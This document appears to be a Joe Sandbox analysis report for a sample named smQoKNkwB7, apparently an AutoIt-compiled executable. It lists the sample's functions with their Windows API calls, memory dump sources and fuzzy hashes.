Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 136b872c374824480c0f3a37ab5d6d618c3959927d05d62b916c7895ef9fd468
Instruction ID: 15da10a227ebfa05d0a473c55b430ac19d8833c6ed82d68845b34914487b617a
Opcode Fuzzy Hash: 136b872c374824480c0f3a37ab5d6d618c3959927d05d62b916c7895ef9fd468
Instruction Fuzzy Hash: 05113A32610705ABCF14FF75DC02FAD77A5AF50B10F20842DF542A61C1EF749A549B50

Function 00218402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00218440

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 1b951e41e1d50f6706e7a9bdc7924c13b4365b38c684e58232e4436514367d73
Instruction ID: 108371e0e15755ae28c3b9ae956307ff798de3ab788850209f75207afdd94cd0
Opcode Fuzzy Hash: 1b951e41e1d50f6706e7a9bdc7924c13b4365b38c684e58232e4436514367d73
Instruction Fuzzy Hash: EA11187590410AAFCB15DF58E9819DA7BF5EF49314F104069F809AB312DA31EA21CBA5

Function 001E9A40 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,001E543F,?,00010000,00000000,00000000,00000000,00000000), ref: 001E9A9C

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 270e954e56c75e5b35c637f55bf3683b90af47379bc8053cfe120a3ba5f6a0c8
Instruction ID: 005b1c836240e6fb7149b49627f873bd422a6e6b1378b1049ea708b828740734
Opcode Fuzzy Hash: 270e954e56c75e5b35c637f55bf3683b90af47379bc8053cfe120a3ba5f6a0c8
Instruction Fuzzy Hash: 36114831204B459FD720CF16C884B6AB7F9EF84764F10C43EE99B8BA51C770A945CB60

Function 00215000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00214C7D: RtlAllocateHeap.NTDLL(00000008,001E1129,00000000,?,00212E29,00000001,00000364,?,?,?,0020F2DE,00213863,002B1444,?,001FFDF5,?), ref: 00214CBE

_free.LIBCMT ref: 0021506C

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction ID: fa724ccc5e4b8f88125a67bd34b864bfb579d22c171c3aa7cdc38bbb8a331b24
Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction Fuzzy Hash: C6012672214705ABE3218E699881ADAFBE9FBDD370F25055DE18483280EA70A855CAB4

Function 0020E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: 7a7b1527afb5efbbcfee44ebbfb21cdace5d477a578e4a6988d1242fe2620448
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: 2CF04432531B149ADB313E69AC05B9A33CC8F62330F120B15F820931C3CB7198B68EA6

Function 00214C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,001E1129,00000000,?,00212E29,00000001,00000364,?,?,?,0020F2DE,00213863,002B1444,?,001FFDF5,?), ref: 00214CBE

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 182990196b4c2d6d852982945e0e524eee5e47388295f2bee5818f26fb606af4
Instruction ID: 599765d3c7f1718d13e830a3bc095fd7649008a7a51174ed988b1ede2a3eddc8
Opcode Fuzzy Hash: 182990196b4c2d6d852982945e0e524eee5e47388295f2bee5818f26fb606af4
Instruction Fuzzy Hash: A5F0E93163222667DB317F769C09BDA37C8BF717A0B148127BC1DA65D1CA70D8B086E0

Function 00213820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,002B1444,?,001FFDF5,?,?,001EA976,00000010,002B1440,001E13FC,?,001E13C6,?,001E1129), ref: 00213852

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 889ee6886653d9c37ef4b78ad675d525a765b90ddfe9e8a8a12b6ab2730b30fd
Instruction ID: 187ad6d4e72d4637e31371f99f346673e6462fa74027ef61d5e65e6feef51f88
Opcode Fuzzy Hash: 889ee6886653d9c37ef4b78ad675d525a765b90ddfe9e8a8a12b6ab2730b30fd
Instruction Fuzzy Hash: E7E0E53213022696D7316F769C08BDB37CBAB627B0F174131BD08928D1DB50DDB185E0

Function 001E4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,002B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001E4F6D

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: eb9a196f57035185a9f5300a028076e77671fa88d8e7a8e12edf56dae738296f
Instruction ID: ecac5d86b255d77338c6cca42dd6086d692b787229b18550e4a4ec178ec8213d
Opcode Fuzzy Hash: eb9a196f57035185a9f5300a028076e77671fa88d8e7a8e12edf56dae738296f
Instruction Fuzzy Hash: 92F03071105B91CFDB389F6AE49481AB7E4AF14719321897EE1DA83511C7359C84DF50

Function 001E2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001E2DC4

Part of subcall function 001E6B57: _wcslen.LIBCMT ref: 001E6B6A

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: edf899a85a0cd19f2220261b7297a1c758a55247069c5af6b9be5afe125ac0fd
Instruction ID: 10f23f7bdfaddaccde788d412aeee71039f319c1f3f60e1d13ebd5e8552b9231
Opcode Fuzzy Hash: edf899a85a0cd19f2220261b7297a1c758a55247069c5af6b9be5afe125ac0fd
Instruction Fuzzy Hash: 93E0CD726002246BC72092989C05FDA77DDDFC87D0F040075FD09D7258DA60ADC08550

Function 00252693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 002526B5

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction ID: 0baa5d910f444f70efc1eea5cd59fbabffaf8d065b34d4a99703570c63be3806
Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction Fuzzy Hash: 30E048B06197009FDF395E28A8517B677D89F4A301F00085EF59B92252E57268598A4D

Function 001E2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 001E3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 001E3908

Part of subcall function 001ED730: GetInputState.USER32 ref: 001ED807

SetCurrentDirectoryW.KERNEL32(?), ref: 001E2B6B

Part of subcall function 001E30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 001E314E

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: 326a8ef40491692f5018e36f3816e10291d8360028a81755b4e401af0e886983
Instruction ID: e4e8c04d9c18bf8c541aac8a533636372778ad3d8d69c5baa1deb78054cfc6a0
Opcode Fuzzy Hash: 326a8ef40491692f5018e36f3816e10291d8360028a81755b4e401af0e886983
Instruction Fuzzy Hash: 8FE026213006C403C604BB72B82A8ADB3599BF1351F80053EF06243162CF2049954311

Function 0022039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00220704,?,?,00000000,?,00220704,00000000,0000000C), ref: 002203B7

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1682e831a282ca9d385bb55ee2cab652053cc5903f1c05024e05b0bb9f08e138
Instruction ID: a783dccc88c8aa8170f7a87de7df11d7f1582616b502fa831e3b04a5b01bd33b
Opcode Fuzzy Hash: 1682e831a282ca9d385bb55ee2cab652053cc5903f1c05024e05b0bb9f08e138
Instruction Fuzzy Hash: 8FD06C3204010DBBDF028F85ED06EDA3BAAFB48714F114050BE1C56020C732E861AB90

Function 001E1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 001E1CBC

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 3b98544524a6c12c318c1be86d53a37f5db569dd1fb9dc44581f6d7525607894
Instruction ID: c9d7b2e16a8fe44b8e77dd067b13e07ed6fd2e08d316d7ef7f706b52fe55455e
Opcode Fuzzy Hash: 3b98544524a6c12c318c1be86d53a37f5db569dd1fb9dc44581f6d7525607894
Instruction Fuzzy Hash: E6C09236280304EFF2288B90BC5EF1077A4E348B00F988101F70DB95E3D3A22860EB50

Function 0023D8DD Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 0023D8E9

Part of subcall function 001E33A7: _wcslen.LIBCMT ref: 001E33AB

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: PathTemp_wcslen
String ID:
API String ID: 1974555822-0
Opcode ID: a66f5d3f783f38d2fbe203cdefa955a6f9ad3127efab7b92df47fe77db2d0aea
Instruction ID: 4f1c0c5b2ac04beb030026904b8a1f14d0addc328b8e672481440f6ce19969fd
Opcode Fuzzy Hash: a66f5d3f783f38d2fbe203cdefa955a6f9ad3127efab7b92df47fe77db2d0aea
Instruction Fuzzy Hash: 9CC04C7451105A9BDB9097A0DCCDAAD7334FF10301F104095E509510519E705B958B11

Function 0025744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 001E5745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,001E949C,?,00008000), ref: 001E5773

GetLastError.KERNEL32(00000002,00000000), ref: 002576DE

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: df4c4c954467ad4908728e4420b949067d7bd074cb73629d78feaf695f23568e
Instruction ID: b289eec99705fbfe1a34dd405af5dd537ba74228e05dafa57703cd48bafe67ce
Opcode Fuzzy Hash: df4c4c954467ad4908728e4420b949067d7bd074cb73629d78feaf695f23568e
Instruction Fuzzy Hash: 4881EF30218B428FC714EF29D491A6DB3E5BF99314F44452CFC8A5B2A2DB30ED59CB96

Function 00D670B0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00D670C1

Memory Dump Source

Source File: 00000000.00000002.2345689506.0000000000D64000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D64000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d64000_smQoKNkwB7.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: c015054fa0b4dbce17a440c8d2af118b4f530b37ad97eb72ed749f5c42a57a11
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 95E0E67494420DDFDB00EFB8D94969E7FF4EF04301F100261FD01D2280D6309D508A72

Non-executed Functions

Function 00279576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 001F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001F9BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0027961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0027965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0027969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002796C9
SendMessageW.USER32 ref: 002796F2
GetKeyState.USER32(00000011), ref: 0027978B
GetKeyState.USER32(00000009), ref: 00279798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002797AE
GetKeyState.USER32(00000010), ref: 002797B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002797E9
SendMessageW.USER32 ref: 00279810
SendMessageW.USER32(?,00001030,?,00277E95), ref: 00279918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0027992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00279941
SetCapture.USER32(?), ref: 0027994A
ClientToScreen.USER32(?,?), ref: 002799AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 002799BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002799D6
ReleaseCapture.USER32 ref: 002799E1
GetCursorPos.USER32(?), ref: 00279A19
ScreenToClient.USER32(?,?), ref: 00279A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 00279A80
SendMessageW.USER32 ref: 00279AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00279AEB
SendMessageW.USER32 ref: 00279B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00279B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00279B4A
GetCursorPos.USER32(?), ref: 00279B68
ScreenToClient.USER32(?,?), ref: 00279B75
GetParent.USER32(?), ref: 00279B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 00279BFA
SendMessageW.USER32 ref: 00279C2B
ClientToScreen.USER32(?,?), ref: 00279C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00279CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 00279CDE
SendMessageW.USER32 ref: 00279D01
ClientToScreen.USER32(?,?), ref: 00279D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00279D82

Part of subcall function 001F9944: GetWindowLongW.USER32(?,000000EB), ref: 001F9952

GetWindowLongW.USER32(?,000000F0), ref: 00279E05

Strings

@GUI_DRAGID, xrefs: 0027997D
F, xrefs: 00279D07
p#+, xrefs: 00279990

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F$p#+
API String ID: 3429851547-1203076301
Opcode ID: 1fa491c257f574a8e2086b0360af16acc68695adf2927c3500ac27c2ae0a6132
Instruction ID: d9b4023cba9d6498b5adf8c072b130fd08e52ae7728877c83609c7873fd001b4
Opcode Fuzzy Hash: 1fa491c257f574a8e2086b0360af16acc68695adf2927c3500ac27c2ae0a6132
Instruction Fuzzy Hash: 44428F70614342AFD724CF24DC88AAABBE9FF49310F10861DF699872A1D771E8A0CF51

Function 00274873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 002748F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00274908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00274927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0027494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0027495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0027497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 002749AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 002749D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00274A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00274A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00274A7E
IsMenu.USER32(?), ref: 00274A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00274AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00274B20
GetWindowLongW.USER32(?,000000F0), ref: 00274B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00274BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00274C82
wsprintfW.USER32 ref: 00274CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00274CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 00274CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00274D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00274D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 00274D5A

Strings

%d/%02d/%02d, xrefs: 00274CA8

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: 597b8765646a07c696c65a79752ef932a8152fb207bd73a88a2a641b11ee42ef
Instruction ID: 3a96a6cbb7804226148354b7979628792869e6ec387cc08338912ccbc90f5137
